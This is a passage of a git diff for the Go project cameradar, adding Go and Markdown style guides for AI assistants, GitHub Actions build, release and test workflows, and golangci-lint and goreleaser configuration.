- Always close the writer; use `CloseWithError(err)` on failures
|
||||
- `io.Pipe` is for streaming, not rewinding or making readers reusable
|
||||
|
||||
- **Warning:** When using `io.Pipe` (especially with multipart writers), all writes must be performed in strict, sequential order. Do not write concurrently or out of order—multipart boundaries and chunk order must be preserved. Out-of-order or parallel writes can corrupt the stream and result in errors.
|
||||
|
||||
- Streaming multipart/form-data with `io.Pipe`:
|
||||
- `pr, pw := io.Pipe()`; `mw := multipart.NewWriter(pw)`; use `pr` as the HTTP request body
|
||||
- Set `Content-Type` to `mw.FormDataContentType()`
|
||||
- In a goroutine: write all parts to `mw` in the correct order; on error `pw.CloseWithError(err)`; on success `mw.Close()` then `pw.Close()`
|
||||
- Do not store request/in-flight form state on a long-lived client; build per call
|
||||
- Streamed bodies are not rewindable; for retries/redirects, buffer small payloads or provide `GetBody`
|
||||
|
||||
### Profiling
|
||||
|
||||
- Use built-in profiling tools (`pprof`)
|
||||
- Benchmark critical code paths
|
||||
- Profile before optimizing
|
||||
- Focus on algorithmic improvements first
|
||||
- Consider using `testing.B` for benchmarks
|
||||
|
||||
## Testing
|
||||
|
||||
### Test Organization
|
||||
|
||||
- Keep tests in the same package (white-box testing) when testing internals
|
||||
- Use a test package (in the same directory) when testing the public API of the package
|
||||
- Use `_test` package suffix for black-box testing
|
||||
- Name test files with `_test.go` suffix
|
||||
- Place test files next to the code they test
|
||||
|
||||
### Writing Tests
|
||||
|
||||
- Use table-driven tests for multiple test cases
|
||||
- Name tests descriptively using `TestType_MethodName_scenario`
|
||||
- Use subtests with `t.Run` for better organization
|
||||
- Test both success and error cases
|
||||
- Use `testify` or similar libraries when they add value, but don't over-complicate simple tests
|
||||
- Use `testify/mock` for mocking dependencies when necessary
|
||||
|
||||
### Test Helpers
|
||||
|
||||
- Mark helper functions with `t.Helper()`
|
||||
- Create test fixtures for complex setup
|
||||
- Use `testing.TB` interface for functions used in tests and benchmarks
|
||||
- Clean up resources using `t.Cleanup()`
|
||||
|
||||
## Security Best Practices
|
||||
|
||||
### Input Validation
|
||||
|
||||
- Validate all external input
|
||||
- Use strong typing to prevent invalid states
|
||||
- Sanitize data before using in SQL queries
|
||||
- Be careful with file paths from user input
|
||||
- Validate and escape data for different contexts (HTML, SQL, shell)
|
||||
|
||||
### Cryptography
|
||||
|
||||
- Use standard library crypto packages
|
||||
- Don't implement your own cryptography
|
||||
- Use crypto/rand for random number generation
|
||||
- Store passwords using bcrypt, scrypt, or argon2 (consider golang.org/x/crypto for additional options)
|
||||
- Use TLS for network communication
|
||||
|
||||
## Documentation
|
||||
|
||||
### Code Documentation
|
||||
|
||||
- Prioritize self-documenting code through clear naming and structure
|
||||
- Document all exported symbols with clear, concise explanations
|
||||
- Start documentation with the symbol name
|
||||
- Write documentation in English by default
|
||||
- Use examples in documentation when helpful
|
||||
- Keep documentation close to code
|
||||
- Update documentation when code changes
|
||||
- Do not use emoji in documentation and comments
|
||||
|
||||
### README and Documentation Files
|
||||
|
||||
- Include clear setup instructions
|
||||
- Document dependencies and requirements
|
||||
- Provide usage examples
|
||||
- Document configuration options
|
||||
- Include troubleshooting section
|
||||
|
||||
## Tools and Development Workflow
|
||||
|
||||
### Essential Tools
|
||||
|
||||
- `make fmt`: Format code
|
||||
- `make lint`: Additional linting
|
||||
- `make test`: Run tests
|
||||
- `go mod`: Manage dependencies
|
||||
|
||||
### Development Practices
|
||||
|
||||
- Run tests before committing (`make test`)
|
||||
- Run linter before committing (`make lint`)
|
||||
- Keep commits focused and atomic
|
||||
- Write meaningful commit messages
|
||||
- Review diffs before committing
|
||||
|
||||
## Common Pitfalls to Avoid
|
||||
|
||||
- Not checking errors
|
||||
- Ignoring race conditions
|
||||
- Creating goroutine leaks
|
||||
- Not using defer for cleanup
|
||||
- Modifying maps concurrently
|
||||
- Not understanding nil interfaces vs nil pointers
|
||||
- Forgetting to close resources (files, connections)
|
||||
- Using global variables unnecessarily
|
||||
- Over-using unconstrained types (e.g., `any`); prefer specific types or generic type parameters with constraints. If an unconstrained type is required, use `any` rather than `interface{}`
|
||||
- Not considering the zero value of types
|
||||
- **Creating duplicate `package` declarations** - this is a compile error; always check existing files before adding package declarations
|
||||
@@ -0,0 +1,534 @@
|
||||
---
|
||||
description: 'Documentation and content creation standards'
|
||||
applyTo: '**/*.md'
|
||||
---
|
||||
|
||||
## Markdown Content Rules
|
||||
|
||||
The following markdown content rules are enforced in the validators:
|
||||
|
||||
1. **Headings**: Use appropriate heading levels (H2, H3, etc.) to structure your content. Do not use an H1 heading, as this will be generated based on the title.
|
||||
2. **Lists**: Use bullet points or numbered lists for lists. Ensure proper indentation and spacing.
|
||||
3. **Code Blocks**: Use fenced code blocks for code snippets. Specify the language for syntax highlighting.
|
||||
4. **Links**: Use proper markdown syntax for links. Ensure that links are valid and accessible.
|
||||
5. **Images**: Use proper markdown syntax for images. Include alt text for accessibility.
|
||||
6. **Tables**: Use markdown tables for tabular data. Ensure proper formatting and alignment.
|
||||
7. **Line Length**: Limit line length to 400 characters for readability.
|
||||
8. **Whitespace**: Use appropriate whitespace to separate sections and improve readability.
|
||||
9. **Front Matter**: Include YAML front matter at the beginning of the file with required metadata fields.
|
||||
|
||||
## Formatting and Structure
|
||||
|
||||
Follow these guidelines for formatting and structuring your markdown content:
|
||||
|
||||
- **Headings**: Use `##` for H2 and `###` for H3. Ensure that headings are used in a hierarchical manner. Recommend restructuring if content includes H4, and more strongly recommend for H5.
|
||||
- **Lists**: Use `-` for bullet points and `1.` for numbered lists. Indent nested lists with two spaces.
|
||||
- **Code Blocks**: Use triple backticks to create fenced code blocks. Specify the language after the opening backticks for syntax highlighting (e.g., `csharp`).
|
||||
- **Links**: Use `[link text](URL)` for links. Ensure that the link text is descriptive and the URL is valid.
|
||||
- **Images**: Use `![alt text](URL)` for images. Include a brief description of the image in the alt text.
|
||||
- **Tables**: Use `|` to create tables. Ensure that columns are properly aligned and headers are included.
|
||||
- **Line Length**: Break lines at 80 characters to improve readability. Use soft line breaks for long paragraphs.
|
||||
- **Whitespace**: Use blank lines to separate sections and improve readability. Avoid excessive whitespace.
|
||||
|
||||
## Follow our Guidelines
|
||||
|
||||
### Spelling
|
||||
|
||||
In cases where American spelling differs from Commonwealth/"British" spelling, use the American spelling.
|
||||
|
||||
Although non-American readers tend to be tolerant of reading American spelling in technical documentation,
|
||||
they may find it difficult to have to type American spelling.
|
||||
For example, if your documentation tells a reader who's used to the spelling colour to type color,
|
||||
they may mistype it. So when you use filenames, URLs, and data parameters in examples,
|
||||
try to avoid words that are spelled differently by different groups of English speakers.
|
||||
|
||||
### Write accessibly
|
||||
|
||||
#### Ease of reading
|
||||
|
||||
* Do not force line breaks (hard returns) within sentences and paragraphs.
|
||||
Line breaks might not work well in resized windows or with enlarged text.
|
||||
* Break up walls of text to aid in scannability.
|
||||
For example, separate paragraphs, create headings, and use lists.
|
||||
* Prefer short sentences.
|
||||
* Define acronyms and abbreviations on first usage and if they are used infrequently.
|
||||
* Place distinguishing and important information of a paragraph in the first sentence to aid in scannability.
|
||||
* Use clear and direct language. Avoid the use of double negatives and exceptions in exceptions.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
A missing path will not prevent you from continuing.
|
||||
```
|
||||
|
||||
<ul>
|
||||
<li>Double negation (missing, not)</li>
|
||||
<li>Use of future tense (will)</li>
|
||||
</ul>
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
You can continue without a path.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Headings and titles
|
||||
|
||||
Use descriptive headings and titles because they help a reader navigate their browser and the page.
|
||||
It's easier to jump between pages and sections of a page if the headings and titles are unique.
|
||||
|
||||
* Use a heading hierarchy.
|
||||
* Do not skip levels of hierarchy (`h3` can only exist under `h2`)
|
||||
* Do not use empty headings
|
||||
* Use a level-1 heading for the page title.
|
||||
* Use sentence casing for titles and headings.
|
||||
|
||||
#### Links
|
||||
|
||||
* Use meaningful link text. Links should make sense when read out of context.
|
||||
* Do not force links to open in a new tab or window, let the reader decide how to open links.
|
||||
* When possible, avoid adjacent links. Instead, put at least one character in between to separate them.
|
||||
* If a link downloads a file, indicate this action and the file type in the link text.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
Use meaningful link text like described [here](https://developers.google.com/style/link-text).
|
||||
Use meaningful link text. [See document.](https://developers.google.com/style/link-text)
|
||||
Use meaningful link text. https://developers.google.com/style/link-text
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Use [meaningful link text](https://developers.google.com/style/link-text).
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Images
|
||||
|
||||
* When possible, use SVG images over any other format, since they are significantly lighter while having perfect information.
|
||||
* For every image, provide alt text that adequately summarizes the intent of each image.
|
||||
* Most of the time, do not present new information in images; always provide an equivalent text explanation with the image. There are of course exceptions for that, such as architecture diagrams, sequence diagrams etc.
|
||||
* Do not repeat images.
|
||||
* Avoid images of text, use text instead.
|
||||
|
||||
#### Tables
|
||||
|
||||
* Introduce tables in the text preceding the table.
|
||||
* Avoid using tables to lay out pages.
|
||||
* If the table contains only a single column, use a list instead.
|
||||
* Do not put tables in the middle of lists or sentences.
|
||||
* Sort rows in a logical order, or alphabetically if there is no logical order.
|
||||
|
||||
### Use the active voice
|
||||
|
||||
In general, use the active voice instead of the passive voice. Make it clear who is performing the action.
|
||||
When using passive voice, it is easy to neglect to indicate who or what is performing the described action.
|
||||
In this kind of construction, it is often hard for readers to figure out who is supposed to do something.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
The service is queried, and an acknowledgment is sent.
|
||||
The service is queried by you, and an acknowledgment is sent by the server.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Send a query to the service. The server sends an acknowledgment.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Exceptions
|
||||
|
||||
In certain cases, it makes more sense to use the passive voice.
|
||||
|
||||
* To emphasize an object over an action.
|
||||
* To de-emphasize a subject or actor.
|
||||
* If your readers do not need to know who is responsible for the action.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
You created over 50 conflicts in the file.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Over 50 conflicts were found in the file.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
The system saved your file.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
The file is saved.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
A system administrator purged the database in January.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
The database was purged in January.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
### Write for a global audience
|
||||
|
||||
* Provide context. Do not assume that the reader already knows what you're talking about.
|
||||
* Avoid negative constructions when possible. Consider whether it's necessary to tell the reader what they can't do instead of what they can.
|
||||
* Avoid directional language (for example, above or below) in procedural documentation.
|
||||
This increases maintenance costs and could lead to future modifications breaking the documentation.
|
||||
|
||||
Here are some examples.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
This document makes use of the following terms:
|
||||
```
|
||||
|
||||
Can be replaced with a simpler verb.
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
This document uses the following terms:
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
A hybrid cloud-native DevSecOps pipeline
|
||||
```
|
||||
|
||||
Too many nouns as modifiers of another noun. Can be broken into two parts.
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
A cloud-native DevSecOps pipeline in a hybrid environment
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
Only request one token.
|
||||
```
|
||||
|
||||
Misplaced modifier, makes the sentence less clear and more ambiguous.
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Request only one token.
|
||||
Request no more than one token.
|
||||
Request a single token.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
If you use the term green beer in an ad, then make sure that it is targeted.
|
||||
```
|
||||
|
||||
Here, "it is" becomes ambiguous. It could describe the green beer or the ad.
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
If you use the term green beer in an ad, then make sure that the ad is targeted.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Use present tense
|
||||
|
||||
In general, use present tense rather than future tense; in particular, try to avoid using _will_ where possible.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
Send a query to the service. The server will send an acknowledgment.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Send a query to the service. The server sends an acknowledgment.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
Sometimes, of course, future tense is unavoidable because you're actually talking about the future
|
||||
(for example, _This document will be outdated once PR #12345 gets merged._).
|
||||
Attempting to predict the future in a document is usually a bad idea, but sometimes it's necessary.
|
||||
|
||||
However, the fact that the reader will be writing and running code in the future isn't a good reason to use future tense.
|
||||
|
||||
Also avoid the hypothetical future _would_—for example:
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
You can send an unsubscribe message. The server would then remove you from the mailing list.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
If you send an unsubscribe message, the server removes you from the mailing list.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Use clear, precise, unambiguous language
|
||||
|
||||
* Use simple words. For example, do not use words like _commence_ when you mean _start_ or _begin_.
|
||||
* Define abbreviations. Abbreviations can be confusing out of context, and they don't translate well.
|
||||
Spell things out whenever possible, at least the first time that you use a given term.
|
||||
|
||||
#### Be consistent
|
||||
|
||||
If you use a particular term for a particular concept in one place, then use that exact same term elsewhere, including the same capitalization.
|
||||
|
||||
* Use standard English word order. Sentences follow the subject + verb + object order.
|
||||
* Try to keep the main subject and verb as close to the beginning of the sentence as possible.
|
||||
* Use the conditional clause first. If you want to tell the audience to do something in a particular circumstance, mention the circumstance before you provide the instruction.
|
||||
* Make list items consistent. Make list items parallel in structure. Be consistent in your capitalization and punctuation.
|
||||
* Use consistent typographic formats. Use bold and italics consistently. Don't switch from using italics for emphasis to underlining.
|
||||
* Avoid colloquialisms, idioms, or slang. Phrases like ballpark figure, back burner, or hang in there can be confusing to non-native readers.
|
||||
|
||||
### Describe conditions before instructions
|
||||
|
||||
If you want to tell the reader to do something, try to mention the circumstance, conditions, or goal before you provide the instruction.
|
||||
Mentioning the circumstance first lets the reader skip the instruction if it doesn't apply.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
See [link to other document] for more information.
|
||||
Click Delete if you want to delete the entire document.
|
||||
Using custom domains might add noticeable latency to responses if your app is located in one of the following regions:
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
For more information, see [link to other document].
|
||||
To delete the entire document, click Delete.
|
||||
If your app is located in one of the following regions, using custom domains might add noticeable latency to responses:
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
### Use lists
|
||||
|
||||
Introduce a list with the appropriate context. In most cases, precede a list with an introductory sentence.
|
||||
|
||||
* Use simple numbered lists for steps to be performed in order.
|
||||
* Nested sequential lists can detail sub-steps as well.
|
||||
* Use bulleted lists when there are no sequences or options.
|
||||
|
||||
### Use code blocks
|
||||
|
||||
In most cases, precede a code sample with an introductory sentence.
|
||||
|
||||
* Do not use tabs to indent code; use spaces only.
|
||||
* Wrap lines at 80 characters if you need to, but try to use shorter lines in code blocks.
|
||||
* Specify the code block language, for syntax highlighting.
|
||||
* If the code block is meant to show a command being run, prefer showing the expected output if applicable.
|
||||
|
||||
### Markdown guidelines
|
||||
|
||||
#### Add spacing to headings
|
||||
|
||||
Prefer spacing after `#` and newlines before and after.
|
||||
|
||||
```markdown
|
||||
...text before.
|
||||
|
||||
# Heading 1
|
||||
|
||||
Text after...
|
||||
```
|
||||
|
||||
#### Use lazy numbering for long lists
|
||||
|
||||
Markdown is smart enough to let the resulting HTML render your numbered lists correctly.
|
||||
For longer lists that may change, especially long nested lists, use _lazy_ numbering.
|
||||
|
||||
```markdown
|
||||
1. Foo.
|
||||
1. Bar.
|
||||
1. Barbaz.
|
||||
1. Barbar.
|
||||
1. Baz.
|
||||
```
|
||||
|
||||
However, if the list is small, and you don’t anticipate changing it, prefer fully numbered lists,
|
||||
because it is nicer to read in source.
|
||||
|
||||
#### Long links
|
||||
|
||||
Long links make source Markdown difficult to read and break the 80 character wrapping. Wherever possible, **shorten your links**.
|
||||
If it is not possible, feel free to reference links at the bottom of the paragraph instead:
|
||||
|
||||
```markdown
|
||||
This paragraph's lines would get very long and difficult to wrap if the [full link] is included inline.
|
||||
|
||||
[full link]:https://www.reallylong.link/rll/BFob89Cv/Owa_TbBBi3Bn9/n5cahxQtC4TOH/afoPnUDyyOS/_8Ilq4zSBjqmo8w/j6UN1uviS9zky
|
||||
```
|
||||
|
||||
#### Prefer lists to tables
|
||||
|
||||
Any tables in your Markdown should be small.
|
||||
Complex, large tables are difficult to read in source and most importantly, a pain to modify later.
|
||||
|
||||
Lists and subheadings usually suffice to present the same information in a slightly less compact,
|
||||
though much more edit-friendly way.
|
||||
|
||||
Here is a bad example:
|
||||
|
||||
```markdown
|
||||
Fruit | Attribute | Notes
|
||||
--- | --- | ---
|
||||
Apple | [Juicy](https://example.com/SomeReallyReallyReallyReallyReallyReallyReallyReallyLongQuery), Firm, Sweet | Apples keep doctors away.
|
||||
Banana | [Convenient](https://example.com/SomeDifferentReallyReallyReallyReallyReallyReallyReallyReallyLongQuery), Soft, Sweet | Contrary to popular belief, most apes prefer mangoes.
|
||||
```
|
||||
|
||||
And here is a better alternative:
|
||||
|
||||
```markdown
|
||||
## Fruits
|
||||
|
||||
### Apple
|
||||
|
||||
* [Juicy](https://SomeReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyLongURL)
|
||||
* Firm
|
||||
* Sweet
|
||||
|
||||
Apples keep doctors away.
|
||||
|
||||
### Banana
|
||||
|
||||
* [Convenient](https://example.com/SomeDifferentReallyReallyReallyReallyReallyReallyReallyReallyLongQuery)
|
||||
* Soft
|
||||
* Sweet
|
||||
|
||||
Contrary to popular belief, most apes prefer mangoes.
|
||||
```
|
||||
|
||||
#### Strongly prefer Markdown to HTML
|
||||
|
||||
Please prefer standard Markdown syntax wherever possible and avoid HTML hacks.
|
||||
If you cannot seem to accomplish what you want, reconsider whether you really need it.
|
||||
Except for big tables, Markdown meets almost all needs already.
|
||||
|
||||
Every bit of HTML or Javascript hacking reduces the readability and portability.
|
||||
This in turn limits the usefulness of integrations with other tools, which may either present the source as plain text or render it.
|
||||
|
||||
#### Spacing
|
||||
|
||||
* Remove all trailing whitespaces at end of lines.
|
||||
* Remove instances of multiple consecutive blank lines.
|
||||
* Files should end with a single newline character.
|
||||
|
||||
|
||||
## Validation Requirements
|
||||
|
||||
Ensure compliance with the following validation requirements:
|
||||
|
||||
- **Front Matter**: Include the following fields in the YAML front matter:
|
||||
|
||||
- `post_title`: The title of the post.
|
||||
- `author1`: The primary author of the post.
|
||||
- `post_slug`: The URL slug for the post.
|
||||
- `microsoft_alias`: The Microsoft alias of the author.
|
||||
- `featured_image`: The URL of the featured image.
|
||||
- `categories`: The categories for the post. These categories must be from the list in /categories.txt.
|
||||
- `tags`: The tags for the post.
|
||||
- `ai_note`: Indicate if AI was used in the creation of the post.
|
||||
- `summary`: A brief summary of the post. Recommend a summary based on the content when possible.
|
||||
- `post_date`: The publication date of the post.
|
||||
|
||||
- **Content Rules**: Ensure that the content follows the markdown content rules specified above.
|
||||
- **Formatting**: Ensure that the content is properly formatted and structured according to the guidelines.
|
||||
- **Validation**: Run the validation tools to check for compliance with the rules and guidelines.
|
||||
|
||||
## Admonitions
|
||||
|
||||
Use GitHub-flavored markdown for admonitions: NOTE, WARNING, TIP, IMPORTANT, CAUTION.
|
||||
|
||||
Examples:
|
||||
|
||||
```markdown
|
||||
> [!NOTE]
|
||||
> Highlights information that users should take into account, even when skimming.
|
||||
|
||||
> [!TIP]
|
||||
> Optional information to help a user be more successful.
|
||||
|
||||
> [!IMPORTANT]
|
||||
> Crucial information necessary for users to succeed.
|
||||
|
||||
> [!WARNING]
|
||||
> Critical content demanding immediate user attention due to potential risks.
|
||||
|
||||
> [!CAUTION]
|
||||
> Negative potential consequences of an action.
|
||||
```
|
||||
@@ -0,0 +1,56 @@
|
||||
name: Go Build
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
pull_request:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: read
|
||||
id-token: write
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v6
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Install Go
|
||||
id: install-go
|
||||
uses: actions/setup-go@v6
|
||||
with:
|
||||
go-version-file: 'go.mod'
|
||||
cache: false
|
||||
|
||||
- name: Cache Go mod
|
||||
id: gomod
|
||||
uses: actions/cache@v5
|
||||
with:
|
||||
path: ~/go/pkg/mod
|
||||
key: ${{ runner.os }}-go-mod-${{ hashFiles('**/go.sum') }}
|
||||
restore-keys: |
|
||||
${{ runner.os }}-go-mod-
|
||||
|
||||
- name: Cache Go build
|
||||
uses: actions/cache@v5
|
||||
with:
|
||||
path: ~/.cache/go-build
|
||||
key: ${{ runner.os }}-go-build-${{ github.ref_name }}
|
||||
restore-keys: |
|
||||
${{ runner.os }}-go-build-
|
||||
|
||||
- name: Download dependencies
|
||||
run: go mod download
|
||||
if: steps.gomod.outputs.cache-hit != 'true'
|
||||
|
||||
- name: Run GoReleaser
|
||||
uses: goreleaser/goreleaser-action@v6
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GORELEASER_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
distribution: goreleaser
|
||||
version: ${{ inputs.GORELEASER_VERSION }}
|
||||
args: release --clean --snapshot --skip=docker
|
||||
@@ -0,0 +1,47 @@
|
||||
name: Release
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
|
||||
jobs:
|
||||
release:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: write
|
||||
id-token: write
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v6
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Install Go
|
||||
id: install-go
|
||||
uses: actions/setup-go@v6
|
||||
with:
|
||||
go-version-file: 'go.mod'
|
||||
|
||||
- name: Download dependencies
|
||||
run: go mod download
|
||||
if: steps.install-go.outputs.cache-hit != 'true'
|
||||
|
||||
- name: Log in to Docker Hub
|
||||
uses: docker/login-action@v3
|
||||
with:
|
||||
username: ${{ secrets.DOCKERHUB_USERNAME }}
|
||||
password: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
|
||||
- name: Run GoReleaser
|
||||
uses: goreleaser/goreleaser-action@v6
|
||||
env:
|
||||
GORELEASER_CURRENT_TAG: ${{ github.ref_name }}
|
||||
DOCKER_REPOSITORY: ullaakut/cameradar
|
||||
DOCKER_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
|
||||
DOCKER_PASSWORD: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
GITHUB_TOKEN: ${{ secrets.GORELEASER_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
distribution: goreleaser
|
||||
version: ${{ inputs.GORELEASER_VERSION }}
|
||||
args: release --clean
|
||||
@@ -0,0 +1,70 @@
|
||||
name: Test
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
pull_request:
|
||||
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: read
|
||||
id-token: write
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v6
|
||||
|
||||
# Go Test looks at `mtime` for caching. `git clone` messes with this. Set it consistently to last commit time.
|
||||
- name: Restore file modification time
|
||||
run: git ls-files -z | while read -d '' path; do touch -d "$(git log -1 --format="@%ct" "$path")" "$path"; done
|
||||
|
||||
# We need to set a cache marker to ensure that the cache is individual for each job.
|
||||
- name: Add Cache Marker
|
||||
run: echo "go-test" > env.txt
|
||||
|
||||
- name: Install Go
|
||||
id: install-go
|
||||
uses: actions/setup-go@v6
|
||||
with:
|
||||
go-version-file: 'go.mod'
|
||||
cache-dependency-path: |
|
||||
go.sum
|
||||
env.txt
|
||||
|
||||
# We trigger mod download separately as otherwise it will count towards
|
||||
# the 1 minute default timeout of golangci-lint. Only needed if there is no cache.
|
||||
- name: Download dependencies
|
||||
run: go mod download
|
||||
if: steps.install-go.outputs.cache-hit != 'true'
|
||||
|
||||
- name: Run Linter
|
||||
uses: golangci/golangci-lint-action@v9
|
||||
with:
|
||||
version: v2.7.2
|
||||
|
||||
- name: Setup gotestsum
|
||||
uses: gertd/action-gotestsum@v3.0.0
|
||||
with:
|
||||
gotestsum_version: v1.13.0
|
||||
|
||||
- name: Download nmap
|
||||
run: sudo apt-get install -y nmap
|
||||
|
||||
- name: Run Tests
|
||||
env:
|
||||
TEST_DIR: ${{ inputs.TEST_DIR }}
|
||||
run: |
|
||||
GOTESTSUM_FLAGS="--junitfile tests.xml --format pkgname -- -cover -race"
|
||||
if [ -z "$TEST_DIR" ]; then
|
||||
gotestsum $GOTESTSUM_FLAGS ./...
|
||||
else
|
||||
gotestsum $GOTESTSUM_FLAGS ./$TEST_DIR/...
|
||||
fi
|
||||
|
||||
- name: Test Summary
|
||||
uses: test-summary/action@v2
|
||||
with:
|
||||
paths: "tests.xml"
|
||||
if: always()
|
||||
+2
-3
@@ -2,6 +2,5 @@
|
||||
.idea/
|
||||
.vscode/
|
||||
|
||||
# Golang
|
||||
/bin/*
|
||||
/pkg/*
|
||||
# Builds
|
||||
dist/
|
||||
+70
-7
@@ -1,7 +1,70 @@
|
||||
# https://github.com/golangci/golangci/wiki/Configuration
|
||||
|
||||
service:
|
||||
project-path: github.com/Ullaakut/cameradar
|
||||
prepare:
|
||||
- apt-get update && apt-get install -y libcurl4-gnutls-dev
|
||||
- dep ensure
|
||||
version: "2"
|
||||
run:
|
||||
tests: false
|
||||
linters:
|
||||
default: all
|
||||
disable:
|
||||
- depguard
|
||||
- dupl
|
||||
- err113
|
||||
- exhaustive
|
||||
- exhaustruct
|
||||
- forcetypeassert
|
||||
- funcorder
|
||||
- funlen
|
||||
- gochecknoglobals
|
||||
- gochecknoinits
|
||||
- gocyclo
|
||||
- godox
|
||||
- gomoddirectives
|
||||
- inamedparam
|
||||
- ireturn
|
||||
- mnd
|
||||
- nilnil
|
||||
- nlreturn
|
||||
- nonamedreturns
|
||||
- tagliatelle
|
||||
- varnamelen
|
||||
- wrapcheck
|
||||
- wsl
|
||||
- wsl_v5
|
||||
settings:
|
||||
cyclop:
|
||||
max-complexity: 15
|
||||
gosec:
|
||||
excludes:
|
||||
- G101
|
||||
- G304
|
||||
- G402
|
||||
lll:
|
||||
line-length: 160
|
||||
tagliatelle:
|
||||
case:
|
||||
rules:
|
||||
json: pascal
|
||||
use-field-name: true
|
||||
exclusions:
|
||||
generated: lax
|
||||
rules:
|
||||
- path: (.+)\.go$
|
||||
text: 'ST1000: at least one file in a package should have a package comment'
|
||||
- path: (.+)\.go$
|
||||
text: 'package-comments: should have a package comment'
|
||||
- path: (.+)\.go$
|
||||
text: 'Error return value of `.+\.Close` is not checked'
|
||||
- linters:
|
||||
- cyclop
|
||||
path: (.+)_test\.go
|
||||
paths: []
|
||||
formatters:
|
||||
enable:
|
||||
- gci
|
||||
- gofmt
|
||||
- gofumpt
|
||||
- goimports
|
||||
settings:
|
||||
gofumpt:
|
||||
extra-rules: true
|
||||
exclusions:
|
||||
generated: lax
|
||||
paths: []
|
||||
|
||||
+100
@@ -0,0 +1,100 @@
|
||||
version: 2
|
||||
project_name: cameradar
|
||||
dist: dist/cameradar
|
||||
|
||||
env:
|
||||
- GO111MODULE=on
|
||||
before:
|
||||
hooks:
|
||||
- go mod download
|
||||
|
||||
builds:
|
||||
- binary: cameradar
|
||||
main: ./cmd/cameradar
|
||||
env:
|
||||
